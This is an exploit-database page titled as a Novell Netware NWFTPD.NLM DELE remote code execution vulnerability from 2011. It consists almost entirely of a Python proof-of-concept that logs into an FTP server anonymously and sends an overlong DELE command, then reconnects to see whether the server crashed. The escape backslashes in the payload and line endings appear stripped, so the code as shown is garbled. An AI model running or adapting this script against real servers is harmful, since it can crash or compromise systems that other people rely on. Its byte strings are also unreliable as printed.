Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability
# Published : 2011-03-21
# Author : Francis Provencher
# Previous Title : SpoonFTP 1.2 RETR Denial of Service Vulnerability
# Next Title : RealPlayer <= 14.0.1.633 Heap Overflow Vulnerability

#!/usr/bin/python
 
import socket, sys

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25
 
host = (sys.argv[1])
data = "x44x45x4cx45x20x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x3fx41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x42x42x42x42x42x42x42x42x42x42x43x43x43x43x43x43x43x43x43x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x45x45x45x45x45x45x46x46x46x46x47x47x47x47x48x48x44x43x42x41x0dx0a"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((host, 21))
	d=s.recv(1024)
	print (d)
	s.send("USER totorn") #anonymous login so anything goes
	d=s.recv(1024)
	print (d)
	s.send("PASS totorn")
	d=s.recv(1024)
	print (d)
	s.send(data)
	d=s.recv(1024)
	print (d)
	s.close()
	
	try:
		s.connect((host,21))
	except:
		print ("rn[i] Beep Beep, take a look to your Abend log file.")
except:
	print ("[i] Error")